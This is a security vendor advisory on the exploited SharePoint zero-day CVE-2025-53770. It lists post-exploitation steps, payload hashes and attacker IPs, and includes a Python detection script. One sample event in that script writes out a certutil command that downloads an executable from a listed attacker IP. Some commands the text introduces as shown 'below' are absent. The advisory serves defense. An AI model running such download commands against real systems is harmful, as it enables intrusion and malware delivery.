ToolShell: Critical SharePoint Zero-Day Exploited in the Wild
Symantec products already block CVE-2025-53770 exploit attempts.
Update 2025-07-22, 13:23 UTC: Blog has been updated with data on exploitation attempts.
Update 2025-07-22, 12:37 UTC: Blog has been updated with additional details about post-exploitation activity.
Update 2025-07-21, 10:40 UTC: Blog has been updated with additional indicators of compromise (IOCs).
Microsoft has partially patched a zero-day vulnerability in SharePoint following reports of its exploitation in the wild. The vulnerability (CVE-2025-53770), dubbed ToolShell, affects on-premises SharePoint servers and gives an attacker unauthenticated access to vulnerable servers, allowing them to remotely execute code and access all content and file systems. While the 2019 version of SharePoint Server and SharePoint Server Subscription Edition have been patched, the 2016 version remains unpatched.
In its guidance on the vulnerability, Microsoft said it was “aware of active attacks targeting on-premises SharePoint Server customers”. It provided no further information on which actors were behind these attacks.
The new zero-day vulnerability is a variant of a recently patched vulnerability, CVE-2025-49704, which Microsoft patched in July 2025.

Protection
Symantec products already block exploitation of this vulnerability with the following network protection: Web Attack: Microsoft SharePoint CVE-2025-49704.
Related vulnerabilities
A second, related vulnerability (CVE-2025-53771) has also been patched. A path traversal bug, it allows an authorized attacker to perform spoofing over a network. It too is a variant of a recently patched vulnerability (CVE-2025-49706) and the patch includes more robust protections against exploitation of the older flaw.
Post exploitation activity
On some networks where post-exploitation activity took place, the attackers first ran an encoded PowerShell command. The attackers then used Certutil to download a file named client.exe (SHA256: fd03d881f0b3069f5adec6ae69181899e72fd27b3e75bb9075d0798ed3184274) from 134.199.202[.]205 and save it as a file named debug.js.
PowerShell was used to run commands as below, with the -value parameter used to pass commands:
The executable was likely renamed as debug.js in order to make it look benign and avoid raising suspicions. It then ran the following batch file located at c:\\temp\\test.bat:
The executable was also used to run the following files:
- powershell.exe
- tasklist.exe
- ipconfig.exe
- net.exe
- nltest.exe
- systeminfo.exe
- backup.exe
- arp.exe
Backup.exe is a renamed variant of WinRAR. It was used to steal cryptographic secrets:
In addition to this, Certutil was also used to download a file named agent.x64.exe (SHA256: 04f7326c40c33fda51010d067915a1e50b63e00b4ab86db00158d5e067a78ff6). This was used to launch a file named project1.exe (SHA256: 430cf700c7f1b625fded4da4084a0a6c0240b15d52e624a2361bc2512ca2355d).
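The post-exploitation chain above (encoded PowerShell, Certutil downloading an executable saved as debug.js, and discovery tools launched by that renamed binary) can be turned into a simple triage rule over process-creation telemetry. The following is an added example written for this post, not Symantec's detection logic; the event dictionaries are constructed Sysmon/4688-style records, and the hashes and IPs are the ones quoted in the text.

```python
import re

# Indicators quoted in the blog, with defanging brackets removed so they match raw logs.
KNOWN_HASHES = {
    "fd03d881f0b3069f5adec6ae69181899e72fd27b3e75bb9075d0798ed3184274",  # client.exe / debug.js
    "04f7326c40c33fda51010d067915a1e50b63e00b4ab86db00158d5e067a78ff6",  # agent.x64.exe
    "430cf700c7f1b625fded4da4084a0a6c0240b15d52e624a2361bc2512ca2355d",  # project1.exe
}
KNOWN_IPS = {"134.199.202.205", "107.191.58.76", "104.238.159.149", "96.9.125.147"}
# Discovery tools the blog lists as launched by the renamed executable.
RECON_TOOLS = {"tasklist.exe", "ipconfig.exe", "net.exe", "nltest.exe", "systeminfo.exe", "arp.exe"}
EXEC_EXTS = (".exe", ".com", ".bat", ".cmd", ".ps1")
NORMAL_PARENTS = {"cmd.exe", "powershell.exe", "explorer.exe"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage_event(ev):
    """Return the reasons a process-creation event matches the chain (empty list = no match).
    ev has keys image, parent, cmdline and optionally sha256 (constructed field names)."""
    image, parent, cmd = basename(ev["image"]), basename(ev.get("parent", "")), ev.get("cmdline", "")
    reasons = []
    if ev.get("sha256", "").lower() in KNOWN_HASHES:
        reasons.append("known ToolShell payload hash")
    if any(ip in cmd for ip in KNOWN_IPS):
        reasons.append("command line references known ToolShell IP")
    if image == "certutil.exe" and re.search(r"-urlcache", cmd, re.I):
        reasons.append("certutil used as downloader")
        if re.search(r"\.js\b", cmd, re.I):
            reasons.append("download saved with script extension (debug.js pattern)")
    if image == "powershell.exe" and re.search(r"\s-(e|ec|enc|encodedcommand)\s", cmd, re.I):
        reasons.append("encoded PowerShell command")
    if parent and not parent.endswith(EXEC_EXTS):
        reasons.append(f"parent process has non-executable extension ({parent})")
    if image in RECON_TOOLS and parent and parent not in NORMAL_PARENTS:
        reasons.append(f"discovery tool launched by unusual parent ({parent})")
    return reasons

def triage(events):
    """Return only matching events as (event, reasons) pairs."""
    return [(ev, r) for ev in events if (r := triage_event(ev))]

# Constructed sample events modelled on the activity described above, not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://134.199.202.205/client.exe c:\temp\debug.js"},
    {"image": r"C:\temp\debug.js", "parent": r"C:\Windows\System32\cmd.exe", "cmdline": r"c:\temp\debug.js",
     "sha256": "fd03d881f0b3069f5adec6ae69181899e72fd27b3e75bb9075d0798ed3184274"},
    {"image": r"C:\Windows\System32\nltest.exe", "parent": r"C:\temp\debug.js", "cmdline": "nltest /dclist:"},
    {"image": r"C:\Windows\System32\ipconfig.exe", "parent": r"C:\Windows\System32\cmd.exe", "cmdline": "ipconfig /all"},
]

if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(basename(ev["image"]), "->", "; ".join(reasons))
```

The last sample event (ipconfig under cmd.exe) is benign and produces no reasons, which is the behaviour a hunt rule needs to avoid drowning analysts in ordinary administration noise.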
Mitigation and guidance
In addition to immediately updating to the latest version of SharePoint, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) is advising users to monitor for POSTs to:
Users are also advised to conduct scanning for the following IP addresses: 107.191.58[.]76, 104.238.159[.]149, and 96.9.125[.]147, particularly between July 18-19, 2025.
Protection/Mitigation
Network protection
Web Attack: Microsoft SharePoint CVE-2025-49704
For the latest protection updates, please visit the Symantec Protection Bulletin.
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
Note: The IP addresses are a mixture of IPs scanning for CVE-2025-53770 and IPs actively exploiting it.